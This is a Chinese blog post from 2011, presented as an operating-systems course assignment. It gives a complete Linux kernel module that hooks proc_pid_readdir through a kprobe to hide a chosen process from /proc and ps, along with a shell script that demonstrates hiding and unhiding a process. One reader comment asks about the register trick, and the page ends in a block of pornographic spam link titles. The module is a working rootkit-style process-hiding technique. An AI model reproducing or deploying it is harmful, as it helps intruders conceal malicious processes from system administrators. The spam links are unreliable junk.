• <ins id="pjuwb"></ins>
    <blockquote id="pjuwb"><pre id="pjuwb"></pre></blockquote>

    <noscript id="pjuwb"></noscript>
          <sup id="pjuwb"><pre id="pjuwb"></pre></sup>

            <dd id="pjuwb"></dd>
            <abbr id="pjuwb"></abbr>
            

    
            

            




            







												


        

            
	
            
		
			

            

            
	
            
		
			
            糯米
            
			TI DaVinci, gstreamer, ffmpeg
		            		
	
            

            

            

            

            隨筆 - 167, 文章 - 0, 評論 - 47, 引用 - 0
            

            


            		
	
            

            

            
	
            
		
			
            
				數(shù)據(jù)加載中……
			
            
		            		
		
			
            
				
					
	
            
		
            
			Linux內(nèi)核通過inline hook實現(xiàn)隱藏進(jìn)程
		
            
		
            
		這是我們操作系統(tǒng)的大作業(yè)。
            原理就是inline hook 那個 proc 文件系統(tǒng),根目錄下的 readdir 的函數(shù)。
            替換掉第三個參數(shù),filldir。
            代碼爆短,60來行。
            Ubuntu 10.04 測試可用。

            

            #include <linux/kernel.h>
            #include             <linux/kprobes.h>
            #include             <linux/module.h>
            #include             <linux/moduleparam.h>
            #include             <linux/fs.h>

            int register_kprobe(struct kprobe *kp);

            static struct kprobe kp = {
                .symbol_name                = "proc_pid_readdir",
            }            ;

            static filldir_t old_filldir;
            static int pid;

            module_param(pid,             int0744);

            static int filldir(void * __buf, const char * name, int namlen, loff_t offset,
                       u64 ino, unsigned             int d_type)
            {
                            int p;
                sscanf(name,             "%d"&p);
                            if (p == pid)
                                return 0;
                            return old_filldir(__buf, name, namlen, offset, ino, d_type);
            }


            /* kprobe pre_handler: called just before the probed instruction is executed */
            static int handler_pre(struct kprobe *pr, struct pt_regs *regs)
            {
                old_filldir             = (filldir_t)regs->cx;
                regs            ->cx = (typeof(regs->cx))filldir;
                            return 0;
            }

            static int __init k_init(void)
            {
                            int ret;

                kp.pre_handler             = handler_pre;

                ret             = register_kprobe(&kp);
                            if (ret < 0{
                    printk(KERN_INFO             "register_kprobe failed, returned %d\n", ret);
                                return ret;
                }
                printk(KERN_INFO             "Planted kprobe at %p; pid %d\n", kp.addr, pid);

                            return 0;
            }

            static void __exit k_exit(void)
            {
                unregister_kprobe(            &kp);
                printk(KERN_INFO             "kprobe at %p unregistered\n", kp.addr);
            }

            module_init(k_init);
            module_exit(k_exit);
            MODULE_LICENSE(            "GPL");

            


            

            sleep 1000 &
            pid            =`jobs -p`
            echo             'before hide'
            ps aux             | grep $pid
            insmod k.ko pid            =$pid
            echo             'after hide'
            ps aux             | grep $pid
            rmmod k.ko
            echo             'after unhide'
            ps aux             | grep $pid
            

            
		
            
		
            
			posted on 2011-02-23 14:58 糯米 閱讀(2294) 評論(1)  編輯 收藏 引用  所屬分類: Linux 
		
            
	
            
	
	


	


            
	    
    


            

            評論
            
	
	
			
            
				
            
					# re: Linux內(nèi)核通過inline hook實現(xiàn)隱藏進(jìn)程  回復(fù)  更多評論
					  
				
            
				handler_pre() 函數(shù)中為什么 regs->cx 修改為hook函數(shù)就能執(zhí)行hook之后的函數(shù)?

            我使用同樣的方式修改這個內(nèi)核函數(shù) usb_alloc_dev,然而regs->cx存放的并不是有效地地址,是0x00000001
				
            
					2011-12-22 18:31 | quietjolt
				
            
			
            
		

            





            






            

				
			
            
		            		
	
            
	
            
		
			

		
	
            

            

    
    







            
	   
	



看久久久久久a级毛片|
国产91色综合久久免费|
久久99精品久久久大学生|
无码精品久久久天天影视
|
www久久久天天com|
精品久久综合1区2区3区激情|
日日狠狠久久偷偷色综合免费
|
日韩电影久久久被窝网|
久久亚洲中文字幕精品有坂深雪|
国产L精品国产亚洲区久久|
久久久久亚洲av成人网人人软件|
成人a毛片久久免费播放|
亚洲午夜久久久久妓女影院|
大香网伊人久久综合网2020|
久久亚洲精品中文字幕|
99久久婷婷国产一区二区|
色狠狠久久AV五月综合|
亚洲乱码日产精品a级毛片久久
|
久久亚洲国产精品五月天婷|
久久久一本精品99久久精品88|
丰满少妇人妻久久久久久4|
亚洲人成精品久久久久|
亚洲人成电影网站久久|
精品久久久久久99人妻|
青青草原综合久久|
亚洲精品白浆高清久久久久久|
久久久久噜噜噜亚洲熟女综合|
精品久久777|
国内精品伊人久久久久av一坑|
精品久久久一二三区|
亚洲伊人久久成综合人影院
|
婷婷伊人久久大香线蕉AV|
一极黄色视频久久网站|
久久久午夜精品福利内容|
亚洲七七久久精品中文国产|
欧美无乱码久久久免费午夜一区二区三区中文字幕
|
亚洲伊人久久大香线蕉综合图片|
亚洲午夜福利精品久久|
亚洲中文字幕伊人久久无码|
一级a性色生活片久久无少妇一级婬片免费放|
狠狠色综合久久久久尤物|